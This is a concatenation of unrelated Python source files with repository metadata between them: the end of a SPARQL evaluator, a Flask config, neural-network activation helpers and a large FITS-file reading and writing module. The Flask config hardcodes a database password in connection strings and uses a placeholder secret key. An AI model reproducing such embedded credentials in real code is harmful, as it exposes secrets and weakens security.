template = query.template
if not template:
# a construct-where query
template = query.p.p.triples # query->project->bgp ...
graph = Graph()
for c in evalPart(ctx, query.p):
graph += _fillTemplate(template, c)
res = {}
res["type_"] = "CONSTRUCT"
res["graph"] = graph
return res
def evalQuery(graph, query, initBindings, base=None):
initBindings = dict((Variable(k), v) for k, v in initBindings.items())
ctx = QueryContext(graph, initBindings=initBindings)
ctx.prologue = query.prologue
main = query.algebra
if main.datasetClause:
if ctx.dataset is None:
raise Exception(
"Non-conjunctive-graph doesn't know about "
+ "graphs! Try a query without FROM (NAMED)."
)
ctx = ctx.clone() # or push/pop?
firstDefault = False
for d in main.datasetClause:
if d.default:
if firstDefault:
# replace current default graph
dg = ctx.dataset.get_context(BNode())
ctx = ctx.pushGraph(dg)
firstDefault = True
ctx.load(d.default, default=True)
elif d.named:
g = d.named
ctx.load(g, default=False)
return evalPart(ctx, main)
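# --- Illustrative usage sketch (not part of the original source) ---
# Graph.query routes through evalQuery above for in-memory graphs; the triple
# and the query string below are hypothetical demo data.
def _example_eval():
    g = Graph()
    g.add((URIRef("http://example.org/a"),
           URIRef("http://example.org/p"),
           Literal("hello")))
    return list(g.query("SELECT ?o WHERE { ?s ?p ?o }"))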
| 27.753472
| 88
| 0.584511
|
fe7143d233af2a0e00b176efefe591e23e5f4219
| 785
|
py
|
Python
|
config.py
|
Alikhalid2020/Pitches
|
ff703163ce3050ea4a2266cf777828deb1c386fe
|
[
"MIT"
] | 1
|
2021-01-27T22:14:48.000Z
|
2021-01-27T22:14:48.000Z
|
config.py
|
Alikhalid2020/Pitches
|
ff703163ce3050ea4a2266cf777828deb1c386fe
|
[
"MIT"
] | null | null | null |
config.py
|
Alikhalid2020/Pitches
|
ff703163ce3050ea4a2266cf777828deb1c386fe
|
[
"MIT"
] | null | null | null |
import os
class Config:
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    SECRET_KEY = 'SECRET_KEY'
MAIL_SERVER = 'smtp.googlemail.com'
MAIL_PORT = 587
MAIL_USE_TLS = True
MAIL_USERNAME = os.environ.get("MAIL_USERNAME")
MAIL_PASSWORD = os.environ.get("MAIL_PASSWORD")
UPLOADED_PHOTOS_DEST ='app/static/photos'
class ProdConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
class TestConfig(Config):
SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://Morninga:Alikhalid3436@localhost/pitches'
class DevConfig(Config):
SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://morninga:Alikhalid3436@localhost/pitches'
DEBUG = True
config_options = {
'development':DevConfig,
'production':ProdConfig,
'test':TestConfig
}
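# --- Illustrative usage sketch (not part of the original source) ---
# Shows how an application factory would pick one of the classes above;
# the environment variable name and the Flask `app` object are hypothetical.
def _example_get_config():
    return config_options[os.environ.get('FLASK_CONFIG', 'development')]
# app.config.from_object(_example_get_config())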
| 23.787879
| 94
| 0.742675
|
7565d73bfc308a0951e3a17d377c056443c2fdec
| 1,757
|
py
|
Python
|
01-Neural Networks and Deep Learning/week4/dnn_utils_v2.py
|
gaojiaxi/Coursera-Deep-Learning-deeplearning.ai
|
75a2026f1241ec5e7d24583740dc2f9d4f307d41
|
[
"MIT"
] | null | null | null |
01-Neural Networks and Deep Learning/week4/dnn_utils_v2.py
|
gaojiaxi/Coursera-Deep-Learning-deeplearning.ai
|
75a2026f1241ec5e7d24583740dc2f9d4f307d41
|
[
"MIT"
] | null | null | null |
01-Neural Networks and Deep Learning/week4/dnn_utils_v2.py
|
gaojiaxi/Coursera-Deep-Learning-deeplearning.ai
|
75a2026f1241ec5e7d24583740dc2f9d4f307d41
|
[
"MIT"
] | null | null | null |
import numpy as np
def sigmoid(Z):
"""
Implements the sigmoid activation in numpy
Arguments:
Z -- numpy array of any shape
Returns:
A -- output of sigmoid(z), same shape as Z
cache -- returns Z as well, useful during backpropagation
"""
A = 1/(1+np.exp(-Z))
cache = Z
return A, cache
def relu(Z):
"""
Implement the RELU function.
Arguments:
Z -- Output of the linear layer, of any shape
Returns:
A -- Post-activation parameter, of the same shape as Z
cache -- a python dictionary containing "A" ; stored for computing the backward pass efficiently
"""
A = np.maximum(0, Z)
assert(A.shape == Z.shape)
cache = Z
return A, cache
def relu_backward(dA, cache):
"""
Implement the backward propagation for a single RELU unit.
Arguments:
dA -- post-activation gradient, of any shape
cache -- 'Z' where we store for computing backward propagation efficiently
Returns:
dZ -- Gradient of the cost with respect to Z
"""
Z = cache
dZ = np.array(dA, copy=True) # just converting dz to a correct object.
# When z <= 0, you should set dz to 0 as well.
dZ[Z <= 0] = 0
assert (dZ.shape == Z.shape)
return dZ
def sigmoid_backward(dA, cache):
"""
Implement the backward propagation for a single SIGMOID unit.
Arguments:
dA -- post-activation gradient, of any shape
cache -- 'Z' where we store for computing backward propagation efficiently
Returns:
dZ -- Gradient of the cost with respect to Z
"""
Z = cache
s = 1/(1+np.exp(-Z))
dZ = dA * s * (1-s)
assert (dZ.shape == Z.shape)
return dZ
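# --- Illustrative usage sketch (added; not part of the original module) ---
# Small numerical check of the forward/backward pairs defined above.
def _example_activations():
    Z = np.array([[-1.0, 0.0, 2.0]])
    A_relu, cache_relu = relu(Z)        # -> [[0., 0., 2.]]
    A_sig, cache_sig = sigmoid(Z)       # -> approx [[0.269, 0.5, 0.881]]
    dA = np.ones_like(Z)                # pretend upstream gradient of ones
    dZ_relu = relu_backward(dA, cache_relu)   # zeroed wherever Z <= 0
    dZ_sig = sigmoid_backward(dA, cache_sig)  # dA * s * (1 - s)
    return dZ_relu, dZ_sig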
| 21.168675 | 100 | 0.598748 |
255fb2b69560b308ec6f870667c35274b6352ea2 | 56,125 | py | Python | apero/io/drs_fits.py | njcuk9999/apero-drs | 83b043e9f277a011b03e0227c77307961b200901 | ["MIT"] | 1 | 2021-03-09T17:49:31.000Z | 2021-03-09T17:49:31.000Z | apero/io/drs_fits.py | njcuk9999/apero-drs | 83b043e9f277a011b03e0227c77307961b200901 | ["MIT"] | 43 | 2020-10-06T18:42:24.000Z | 2022-03-28T21:23:10.000Z | apero/io/drs_fits.py | njcuk9999/apero-drs | 83b043e9f277a011b03e0227c77307961b200901 | ["MIT"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
# CODE NAME HERE
# CODE DESCRIPTION HERE
Created on 2019-03-21 at 11:36
@author: cook
"""
import numpy as np
from astropy.io import fits
from astropy.table import Table
from astropy.time import Time, TimeDelta
from astropy import version as av
from astropy import units as uu
import os
import warnings
import traceback
from apero.core import constants
from apero.core.core import drs_log
from apero import lang
from apero.io import drs_table
from apero.io import drs_lock
from apero.io import drs_path
from apero.io import drs_text
# =============================================================================
# Define variables
# =============================================================================
__NAME__ = 'io.drs_fits.py'
__INSTRUMENT__ = 'None'
# Get constants
Constants = constants.load(__INSTRUMENT__)
# Get version and author
__version__ = Constants['DRS_VERSION']
__author__ = Constants['AUTHORS']
__date__ = Constants['DRS_DATE']
__release__ = Constants['DRS_RELEASE']
# get param dict
ParamDict = constants.ParamDict
# Get Logging function
WLOG = drs_log.wlog
# alias pcheck
pcheck = drs_log.find_param
# Get the text types
TextEntry = lang.drs_text.TextEntry
# TODO: This should be changed for astropy -> 2.0.1
# hdu.scale has a bug before astropy version 2.0.1, hence the workaround below
if av.major < 2 or (av.major == 2 and av.minor < 1):
SCALEARGS = dict(bscale=(1.0 + 1.0e-8), bzero=1.0e-8)
else:
SCALEARGS = dict(bscale=1, bzero=0)
# =============================================================================
# Define classes
# =============================================================================
# noinspection PyCompatibility
class Header(fits.Header):
"""
Wrapper class for fits headers that allows us to add functionality.
- Stores temporary items with keys starting with '@@@'
- Only shows up through "[]" and "in" operations
- Can automatically convert NaN values to strings
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__temp_items = {}
def __setitem__(self, key: str, item):
"""
Set a key with "item"
same as using: header[key] = item
:param key: str, the key to add to the header
:param item: object, the object to
:return: None
"""
# deal with key not being string
if isinstance(key, tuple):
if key[0].startswith('@@@'):
tmpkey = self.__get_temp_key(key[0])
self.__temp_items.__setitem__(tmpkey, item)
else:
# check for NaN values (and convert -- cannot put directly in)
nan_filtered = self.__nan_check(item)
# do the super __setitem__ on nan filtered item
super().__setitem__(key, nan_filtered)
# if key starts with @@@ add to temp items (without @@@)
if key.startswith('@@@'):
# use the __get_temp_key method to strip key
self.__temp_items.__setitem__(self.__get_temp_key(key), item)
# do not add empty keys
elif key == '':
pass
# else add normal keys
else:
# check for NaN values (and convert -- cannot put directly in)
nan_filtered = self.__nan_check(item)
# do the super __setitem__ on nan filtered item
super().__setitem__(key, nan_filtered)
def __getitem__(self, key: str):
"""
Get an "item" with key
same as using: item = header[key]
:param key: str, the key in the header to get item for
:return: the item in the header with key="key"
"""
# deal with key not being string
if isinstance(key, tuple):
if key[0].startswith('@@@'):
tmpkey = self.__get_temp_key(key[0])
return self.__temp_items.__getitem__(tmpkey)
else:
return super().__getitem__(key)
elif not isinstance(key, str):
return super().__getitem__(key)
# if key starts with @@@ get it from the temporary items storage
if key.startswith('@@@'):
return self.__temp_items.__getitem__(self.__get_temp_key(key))
# else get it from the normal storage location (in super)
else:
return super().__getitem__(key)
def __contains__(self, key: str):
"""
Whether key is in header
same as using: key in header
:param key: str, the key to search for in the header
:return:
"""
# deal with key not being str
if isinstance(key, tuple):
if key[0].startswith('@@@'):
tmpkey = self.__get_temp_key(key[0])
return self.__temp_items.__contains__(tmpkey)
else:
return super().__contains__(key)
elif not isinstance(key, str):
return super().__contains__(key)
# if key starts with @@@ then get it from the temp_items
if key.startswith('@@@'):
return self.__temp_items.__contains__(self.__get_temp_key(key))
# else just do the super contains
else:
return super().__contains__(key)
def copy(self, strip=False):
header = Header(super().copy(strip), copy=False)
header.__temp_items = self.__temp_items.copy()
return header
def to_fits_header(self, strip=True, nan_to_string=True):
header = super().copy(strip=strip)
if nan_to_string:
for key in list(header.keys()):
if isinstance(header[key], fits.header._HeaderCommentaryCards):
header[key] = header[key][0]
else:
header[key] = header[key]
return header
@staticmethod
def from_fits_header(fits_header):
return Header(fits_header, copy=True)
@staticmethod
def __get_temp_key(key):
return key[3:]
@staticmethod
def __nan_check(value):
if isinstance(value, float) and np.isnan(value):
return 'NaN'
elif isinstance(value, float) and np.isposinf(value):
return 'INF'
elif isinstance(value, float) and np.isneginf(value):
return '-INF'
elif type(value) == tuple:
return (Header.__nan_check(value[0]),) + value[1:]
else:
return value
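# --- Illustrative usage sketch (added; not part of the original module) ---
# Shows the two behaviours described in the Header docstring: '@@@' keys live only
# in the temporary store, and NaN floats are converted to the string 'NaN'.
def _example_header_usage():
    hdr = Header()
    hdr['EXPTIME'] = (np.nan, 'exposure time')  # stored as 'NaN' via the NaN check
    hdr['@@@SCRATCH'] = 'temporary value'       # visible via [] and "in" only
    fits_hdr = hdr.to_fits_header()             # plain astropy header, no '@@@' keys
    return hdr['@@@SCRATCH'], fits_hdr['EXPTIME']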
# =============================================================================
# Define read functions
# =============================================================================
def id_drs_file(params, recipe, drs_file_sets, filename=None, nentries=None,
required=True, use_input_file=False):
func_name = __NAME__ + '.id_drs_file()'
# ----------------------------------------------------------------------
# deal with list vs no list for drs_file_sets
if isinstance(drs_file_sets, list):
pass
else:
drs_file_sets = [drs_file_sets]
# ----------------------------------------------------------------------
# storage
found = False
kinds = []
names = []
file_set = None
# ----------------------------------------------------------------------
# loop around file set
for file_set in drs_file_sets:
# get the names of the file_set
names.append(file_set.name)
# ------------------------------------------------------------------
# check we have entries
if len(file_set.fileset) == 0:
continue
# ------------------------------------------------------------------
# check we have a recipe set
if file_set.recipe is None:
file_set.recipe = recipe
# ------------------------------------------------------------------
# check we have a filename set
if file_set.filename is None:
if filename is None:
WLOG(params, 'error', 'filename is not set')
else:
file_set.set_filename(filename)
# ------------------------------------------------------------------
# get the associated files with this generic drs file
fileset = list(file_set.fileset)
# ------------------------------------------------------------------
# loop around files
for drs_file in fileset:
# --------------------------------------------------------------
# debug
dargs = [str(drs_file)]
WLOG(params, 'debug', TextEntry('90-010-00001', args=dargs))
# --------------------------------------------------------------
# copy info from given_drs_file into drs_file
file_in = drs_file.copyother(file_set, recipe=recipe)
# --------------------------------------------------------------
# load the header for this kind
try:
# need to read the file header for this specific drs file
file_in.read_header(log=False)
# copy in hdict from file_set
# - this is the only way to get keys added from file that is
# read above
if file_set.hdict is not None:
for key in file_set.hdict:
file_in.header[key] = file_set.hdict[key]
# if exception occurs continue to next file
# (this is not the correct file)
except Exception as _:
continue
except SystemExit as _:
continue
# --------------------------------------------------------------
# check this file is valid
cond, _ = file_in.check_file()
# --------------------------------------------------------------
# if True we have found our file
if cond:
# ----------------------------------------------------------
found = True
# ----------------------------------------------------------
# load the data for this kind
cond1 = file_set.data is not None
cond2 = file_set.header is not None
# use the data if flagged and if possible (cond1 & cond2)
if use_input_file and cond1 and cond2:
# shallow copy data
file_in.data = file_set.data
# copy over header
file_in.header = file_set.header
else:
file_in.read_data()
# ----------------------------------------------------------
# append to list
kinds.append(file_in)
# ----------------------------------------------------------
# if we only want one entry break here
if nentries == 1:
break
# ----------------------------------------------------------------------
# deal with no files found
if len(kinds) == 0 and required:
# get header keys for info purposes
keys = ['KW_CCAS', 'KW_CREF', 'KW_OBSTYPE', 'KW_TARGET_TYPE',
'KW_OBJNAME']
argstr = ''
for key in keys:
if file_set is not None and file_set.header is not None:
value = file_set.get_key(key)
else:
value = None
argstr += '\t{0}: {1}\n'.format(key, value)
eargs = [' '.join(names), file_set.filename, argstr, func_name]
WLOG(params, 'error', TextEntry('00-010-00001', args=eargs))
# ----------------------------------------------------------------------
# return found and the drs_file instance
if len(kinds) == 0:
return found, kinds
elif nentries == None:
return found, kinds
elif nentries == 1:
return found, kinds[0]
else:
return found, kinds[:nentries]
# =============================================================================
# Define read functions
# =============================================================================
def readfits(params, filename, getdata=True, gethdr=False, fmt='fits-image',
ext=0, func=None, log=True, copy=False):
"""
The drs fits file read function
:param params: ParamDict, the parameter dictionary of constants
:param filename: string, the absolute path to the file
:param getdata: bool, whether to return data from "ext"
:param gethdr: bool, whether to return header from "ext"
:param fmt: str, format of data ('fits-image', 'fits-table' or 'fits-multi')
:param ext: int, the extension to open
:param func: str, function name of calling function (input function)
:type params: ParamDict
:type filename: str
:type getdata: bool
:type gethdr: bool
:type fmt: str
:type ext: int
:type func: str
:returns: if getdata and gethdr: returns data, header, if getdata return
data, if gethdr returns header.
if fmt 'fits-image' returns np.array for data and dictionary for
header, if fmt 'fits-table' returns astropy.table for data and
dictionary for header
"""
if func is None:
func_name = __NAME__ + '.readfits()'
else:
func_name = '{0} and {1}'.format(func, __NAME__ + '.readfits()')
# define allowed values of 'fmt'
allowed_formats = ['fits-image', 'fits-table', 'fits-multi']
# -------------------------------------------------------------------------
# deal with filename not existing
if not os.path.exists(filename):
# check directory exists
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
eargs = [dirname, os.path.basename(filename), func_name]
WLOG(params, 'error', TextEntry('01-001-00013', args=eargs))
else:
eargs = [os.path.basename(filename), dirname, func_name]
WLOG(params, 'error', TextEntry('01-001-00012', args=eargs))
# -------------------------------------------------------------------------
# deal with obtaining data
if fmt == 'fits-image':
data, header = _read_fitsimage(params, filename, getdata, gethdr, ext,
log=log)
elif fmt == 'fits-table':
data, header = _read_fitstable(params, filename, getdata, gethdr, ext,
log=log)
elif fmt == 'fits-multi':
data, header = _read_fitsmulti(params, filename, getdata, gethdr,
log=log)
else:
cfmts = ', '.join(allowed_formats)
eargs = [filename, fmt, cfmts, func_name]
WLOG(params, 'error', TextEntry('00-008-00019', args=eargs))
data, header = None, None
# -------------------------------------------------------------------------
# deal with copying
if copy:
data = np.array(data)
header = fits.Header(header)
# -------------------------------------------------------------------------
# deal with return
if getdata and gethdr:
return data, header
elif getdata:
return data
elif gethdr:
return header
else:
return None
def read_header(params, filename, ext=0, log=True):
func_name = __NAME__ + '.read_header()'
# try to open header
try:
header = fits.getheader(filename, ext=ext)
except Exception as e:
if log:
eargs = [os.path.basename(filename), ext, type(e), e, func_name]
WLOG(params, 'error', TextEntry('01-001-00010', args=eargs))
header = None
else:
raise e
# return header
return header
def _read_fitsmulti(params, filename, getdata, gethdr, log=True):
func_name = __NAME__ + '._read_fitsmulti()'
# attempt to open hdu of fits file
try:
hdulist = fits.open(filename)
except Exception as e:
eargs = [filename, type(e), e, func_name]
WLOG(params, 'error', TextEntry('01-001-00006', args=eargs))
hdulist = None
# -------------------------------------------------------------------------
# get the number of fits files in filename
try:
n_ext = len(hdulist)
except Exception as e:
WLOG(params, 'warning', TextEntry('10-001-00005', args=[type(e), e]))
n_ext = None
# deal with unknown number of extensions
if n_ext is None:
data, header = deal_with_bad_header(params, hdulist, filename)
# -------------------------------------------------------------------------
# else get the data and header based on how many extensions there are
else:
dataarr, headerarr = [], []
for it in range(n_ext):
# append header
try:
headerarr.append(hdulist[it].header)
except Exception as e:
if log:
eargs = [os.path.basename(filename), it, type(e), e,
func_name]
WLOG(params, 'error', TextEntry('01-001-00008', args=eargs))
else:
raise e
# append data
try:
if isinstance(hdulist[it].data, fits.BinTableHDU):
dataarr.append(Table.read(hdulist[it].data))
else:
dataarr.append(hdulist[it].data)
except Exception as e:
if log:
eargs = [os.path.basename(filename), it, type(e), e,
func_name]
WLOG(params, 'error', TextEntry('01-001-00007', args=eargs))
else:
raise e
data = list(dataarr)
header = list(headerarr)
# -------------------------------------------------------------------------
# return data and/or header
if getdata and gethdr:
return data, header
elif getdata:
return data
else:
return header
def _read_fitsimage(params, filename, getdata, gethdr, ext=0, log=True):
# -------------------------------------------------------------------------
# deal with getting data
if getdata:
try:
data = fits.getdata(filename, ext=ext)
except Exception as e:
if log:
string_trackback = traceback.format_exc()
emsg = TextEntry('01-001-00014', args=[filename, ext, type(e)])
emsg += '\n\n' + TextEntry(string_trackback)
WLOG(params, 'error', emsg)
data = None
else:
raise e
else:
data = None
# -------------------------------------------------------------------------
# deal with getting header
if gethdr:
try:
header = fits.getheader(filename, ext=ext)
except Exception as e:
if log:
string_trackback = traceback.format_exc()
emsg = TextEntry('01-001-00015', args=[filename, ext, type(e)])
emsg += '\n\n' + TextEntry(string_trackback)
WLOG(params, 'error', emsg)
header = None
else:
raise e
else:
header = None
# -------------------------------------------------------------------------
# return data and header
return data, header
def _read_fitstable(params, filename, getdata, gethdr, ext=0, log=True):
# -------------------------------------------------------------------------
# deal with getting data
if getdata:
try:
data = Table.read(filename, format='fits')
except Exception as e:
if log:
string_trackback = traceback.format_exc()
emsg = TextEntry('01-001-00016', args=[filename, ext, type(e)])
emsg += '\n\n' + TextEntry(string_trackback)
WLOG(params, 'error', emsg)
data = None
else:
raise e
else:
data = None
# -------------------------------------------------------------------------
# deal with getting header
if gethdr:
try:
header = fits.getheader(filename, ext=ext)
except Exception as e:
if log:
string_trackback = traceback.format_exc()
emsg = TextEntry('01-001-00017', args=[filename, ext, type(e)])
emsg += '\n\n' + TextEntry(string_trackback)
WLOG(params, 'error', emsg)
header = None
else:
raise e
else:
header = None
# -------------------------------------------------------------------------
# return data and header
return data, header
# =============================================================================
# Define write functions
# =============================================================================
def writefits(params, filename, data, header, datatype='image', dtype=None,
func=None):
# ------------------------------------------------------------------
# define a synchronized lock for writing (so multiple instances do not
# run at the same time)
lockfile = os.path.basename(filename)
# start a lock
lock = drs_lock.Lock(params, lockfile)
# ------------------------------------------------------------------
# make locked read function
@drs_lock.synchronized(lock, params['PID'])
def locked_write():
return _write_fits(params, filename, data, header, datatype, dtype,
func)
# ------------------------------------------------------------------
# try to run locked read function
try:
locked_write()
except KeyboardInterrupt as e:
lock.reset()
raise e
except Exception as e:
# reset lock
lock.reset()
raise e
def _write_fits(params, filename, data, header, datatype='image', dtype=None,
func=None):
# deal with function name coming from somewhere else
if func is None:
func_name = __NAME__ + '.writefits()'
else:
func_name = '{0} (via {1})'.format(func, __NAME__ + '.writefits()')
# ----------------------------------------------------------------------
# check if file exists and remove it if it does
if os.path.exists(filename):
try:
os.remove(filename)
except Exception as e:
eargs = [os.path.basename(filename), type(e), e, func_name]
WLOG(params, 'error', TextEntry('01-001-00003', args=eargs))
# ----------------------------------------------------------------------
# make sure we are dealing with lists of data and headers
if not isinstance(data, list):
data = [data]
if not isinstance(header, list):
header = [header.to_fits_header()]
if not isinstance(datatype, list):
datatype = [datatype]
if dtype is not None and not isinstance(dtype, list):
dtype = [dtype]
# ----------------------------------------------------------------------
# header must be same length as data
if len(data) != len(header):
eargs = [filename, len(data), len(header), func_name]
WLOG(params, 'error', TextEntry('00-013-00004', args=eargs))
# datatype must be same length as data
if len(data) != len(datatype):
eargs = [filename, len(data), len(datatype), func_name]
WLOG(params, 'error', TextEntry('00-013-00005', args=eargs))
# if dtype is not None must be same length as data
if dtype is not None:
if len(data) != len(dtype):
eargs = [filename, len(data), len(dtype), func_name]
WLOG(params, 'error', TextEntry('00-013-00006', args=eargs))
# ----------------------------------------------------------------------
# create the multi HDU list
# try to create primary HDU first
if isinstance(header[0], Header):
header0 = header[0].to_fits_header()
else:
header0 = header[0]
# set up primary HDU (if data[0] == image then put this in the primary)
# else if table then primary HDU should be empty
if datatype[0] == 'image':
hdu0 = fits.PrimaryHDU(data[0], header=header0)
start = 1
else:
hdu0 = fits.PrimaryHDU()
start = 0
if dtype is not None:
hdu0.scale(type=dtype[0], **SCALEARGS)
# add all others afterwards
hdus = [hdu0]
for it in range(start, len(data)):
if datatype[it] == 'image':
fitstype = fits.ImageHDU
elif datatype[it] == 'table':
fitstype = fits.BinTableHDU
else:
continue
# add to hdu list
if isinstance(header[it], Header):
header_it = header[it].to_fits_header()
else:
header_it = header[it]
hdu_i = fitstype(data[it], header=header_it)
if dtype is not None and datatype[it] == 'image':
if dtype[it] is not None:
hdu_i.scale(type=dtype[it])
hdus.append(hdu_i)
# convert to HDU list
hdulist = fits.HDUList(hdus)
# except Exception as e:
# eargs = [type(e), e, func_name]
# WLOG(params, 'error', TextEntry('01-001-00004', args=eargs))
# hdulist = None
# ---------------------------------------------------------------------
# write to file
with warnings.catch_warnings(record=True) as w:
try:
hdulist.writeto(filename, overwrite=True)
except Exception as e:
eargs = [os.path.basename(filename), type(e), e, func_name]
WLOG(params, 'error', TextEntry('01-001-00005', args=eargs))
# ---------------------------------------------------------------------
# ignore truncated comment warning since spirou images have some poorly
# formatted header cards
w1 = []
for warning in w:
# Note: cannot change language as we are matching a python warning
# message; it is in English and shouldn't be changed
wmsg = 'Card is too long, comment will be truncated.'
if wmsg != str(warning.message):
w1.append(warning)
# add warnings to the warning logger and log if we have them
drs_log.warninglogger(params, w1)
def add_header_key(header, keystore, value=None):
# only used if one cannot use DrsFitsFile
hkey, hvalue, hcomment = keystore
# deal with value set
if value is not None:
hvalue = value
# add to header
header[hkey] = (hvalue, hcomment)
# return header
return header
# =============================================================================
# Define search functions
# =============================================================================
def find_files(params, recipe, kind=None, path=None, logic='and', fiber=None,
return_table=False, night=None, **kwargs):
"""
Find files using kwargs (using index files located in 'kind' or 'path')
If path is set will use this path to look for index files
If kind is set to 'raw' uses DRS_DATA_RAW path, if kind is set to 'tmp'
uses DRS_DATA_WORKING path, if kind is set to 'red' uses DRS_DATA_REDUC
else uses params['INPATH']
The logic defines how kwargs are added.
kwargs must be in index file (column names) or in params as header keyword
stores (i.e. KW_DPRTYPE = [HEADER key, HEADER value, HEADER comment])
i.e.
find_files(params, kind='tmp', KW_DPRTYPE='FP_FP')
--> will return all files in the working directory with DPRTYPE = 'FP_FP'
find_files(params, kind='red', KW_DPRTYPE=['OBJ_FP', 'OBJ_DARK'],
KW_OUTPUT='EXT_E2DS')
--> will return all files in reduced directory with:
DPRTYPE = OBJ_FP or OBJ_DARK and DRSOUTID
:param params:
:param kind:
:param path:
:param logic:
:param kwargs:
:return:
"""
func_name = __NAME__ + '.find_files()'
# ----------------------------------------------------------------------
# get pseudo constants
pconst = constants.pload(params['INSTRUMENT'])
# get the index file col name
filecol = params['DRS_INDEX_FILENAME']
nightcol = params['REPROCESS_NIGHTCOL']
timecol = 'KW_MID_OBS_TIME'
# ----------------------------------------------------------------------
# deal with setting path
if path is not None:
path = str(path)
columns = None
index_files = None
index_dir = None
elif kind == 'raw':
# get index table (generate if needed)
indextable, index_dir = find_raw_files(params, recipe)
# construct index file path for raw
raw_index_file = pcheck(params, 'REPROCESS_RAWINDEXFILE',
'raw_index_file', kwargs, func_name)
mpath = os.path.join(params['DRS_DATA_RUN'], raw_index_file)
# set the columns from table
columns = indextable.colnames
# set index files
index_files = [mpath]
elif kind == 'tmp':
path = params['DRS_DATA_WORKING']
columns = pconst.OUTPUT_FILE_HEADER_KEYS()
index_files = None
index_dir = None
elif kind == 'red':
path = params['DRS_DATA_REDUC']
columns = pconst.OUTPUT_FILE_HEADER_KEYS()
index_files = None
index_dir = None
else:
path = params['INPATH']
columns = None
index_files = None
index_dir = None
# ----------------------------------------------------------------------
# deal with making sure all kwargs are in columns (if columns defined)
if columns is not None:
for kwarg in kwargs:
# if dkey not in columns report error
if kwarg not in columns:
# log and raise error
eargs = [kwarg, path, func_name]
WLOG(params, 'error', TextEntry('00-004-00001', args=eargs))
# ----------------------------------------------------------------------
# get index files
if index_files is None:
index_files = get_index_files(params, path, night=night)
# ----------------------------------------------------------------------
# valid files storage
valid_files = []
table_list = []
time_list = []
# filters added string
fstring = ''
# ----------------------------------------------------------------------
# loop through index files
for index_file in index_files:
# read index file
index = drs_table.read_fits_table(params, index_file)
# get directory
if index_dir is None:
dirname = os.path.dirname(index_file)
else:
dirname = index_dir
# ------------------------------------------------------------------
# overall masks
mask = np.ones(len(index), dtype=bool)
# filters added string
fstring = ''
# ------------------------------------------------------------------
# filter via kwargs
for kwarg in kwargs:
# --------------------------------------------------------------
# if dkey is not found in index file then report error
if kwarg not in index.colnames:
# report error
eargs = [kwarg, index_file, func_name]
WLOG(params, 'error', TextEntry('00-004-00002', args=eargs))
# --------------------------------------------------------------
# deal with list of args
if isinstance(kwargs[kwarg], list):
# get new mask
mask0 = np.zeros_like(mask)
# loop around kwargs[kwarg] values (has to be logic==or here)
for value in kwargs[kwarg]:
mask0 |= (index[kwarg] == value.strip())
else:
mask0 = (index[kwarg] == kwargs[kwarg])
# --------------------------------------------------------------
# mask by filter
if logic == 'or':
mask |= mask0
else:
mask &= mask0
# --------------------------------------------------------------
# add to fstring
fstring += '\n\t{0}=\'{1}\''.format(kwarg, kwargs[kwarg])
# ------------------------------------------------------------------
# get files for those that remain
masked_files = index[filecol][mask]
if index_dir is None:
nightnames = np.array(mask).astype(int)
else:
nightnames = index[nightcol][mask]
# ------------------------------------------------------------------
masked_index = index[mask]
# new mask for index files
mask1 = np.zeros(len(masked_files), dtype=bool)
# check that files exist
# loop around masked files
for row, filename in enumerate(masked_files):
# deal with requiring night name
if index_dir is None:
nightname = ''
else:
nightname = nightnames[row]
# --------------------------------------------------------------
# deal with fiber
if fiber is not None:
# two conditions for not having fiber in name
cond1 = '_{0}.'.format(fiber) not in filename
cond2 = '_{0}_'.format(fiber) not in filename
# if both conditions are True then skip
if cond1 and cond2:
continue
# get time value
timeval = float(masked_index[timecol][row])
# construct absolute path
absfilename = os.path.join(dirname, nightname, filename)
# check that file exists
if not os.path.exists(absfilename):
continue
# deal with returning index
mask1[row] = True
# append to storage
if absfilename not in valid_files:
valid_files.append(absfilename)
time_list.append(timeval)
# ------------------------------------------------------------------
# append to table list
if return_table:
table_list.append(masked_index[mask1])
# ----------------------------------------------------------------------
# log found
wargs = [len(valid_files), fstring]
WLOG(params, '', TextEntry('40-004-00004', args=wargs))
# ----------------------------------------------------------------------
# define sort mask (sort by time column)
sortmask = np.argsort(time_list)
# make sure valid_files is a numpy array
valid_files = np.array(valid_files)
# deal with table list
if return_table:
indextable = drs_table.vstack_cols(params, table_list)
return valid_files[sortmask], indextable[sortmask]
else:
# return full list
return valid_files[sortmask]
def get_index_files(params, path=None, required=True, night=None):
"""
Get index files in path (or sub-directory of path)
if path is "None" params['INPATH'] is used
:param params: ParamDict, the parameter dictionary of constants
:param path: str, the path to check for filetypes (must have index files
in this path or sub directories of this path)
if path is "None" params['INPATH'] is used
:param required: bool, if True generates an error when None found
:param night: str or None, if set filters index files by night
:type params: ParamDict
:type path: str
:type required: bool
:type night: str
:return: the absolute paths to all index files under path
:rtype: list[str]
"""
func_name = __NAME__ + '.get_index_files()'
# deal with no path set
if path is None:
path = params['INPATH']
# storage of index files
index_files = []
# walk through path and find index files
for root, dirs, files in os.walk(path, followlinks=True):
# skip nights if required
if night is not None:
if not root.strip(os.sep).endswith(night):
continue
for filename in files:
if filename == params['DRS_INDEX_FILE']:
index_files.append(os.path.join(root, filename))
# log number of index files found
if len(index_files) > 0:
WLOG(params, '', TextEntry('40-004-00003', args=[len(index_files)]))
elif required:
eargs = [path, func_name]
WLOG(params, 'error', TextEntry('01-001-00021', args=eargs))
# return the index files
return np.sort(index_files)
def find_raw_files(params, recipe, **kwargs):
func_name = __NAME__ + '.find_raw_files()'
# get properties from params
night_col = pcheck(params, 'REPROCESS_NIGHTCOL', 'night_col', kwargs,
func_name)
absfile_col = pcheck(params, 'REPROCESS_ABSFILECOL', 'absfile_col',
kwargs,
func_name)
modified_col = pcheck(params, 'REPROCESS_MODIFIEDCOL', 'modified_col',
kwargs, func_name)
sortcol = pcheck(params, 'REPROCESS_SORTCOL_HDRKEY', 'sortcol', kwargs,
func_name)
raw_index_file = pcheck(params, 'REPROCESS_RAWINDEXFILE',
'raw_index_file',
kwargs, func_name)
itable_filecol = pcheck(params, 'DRS_INDEX_FILENAME', 'itable_filecol',
kwargs, func_name)
# get path
path, rpath = _get_path_and_check(params, 'DRS_DATA_RAW')
# print progress
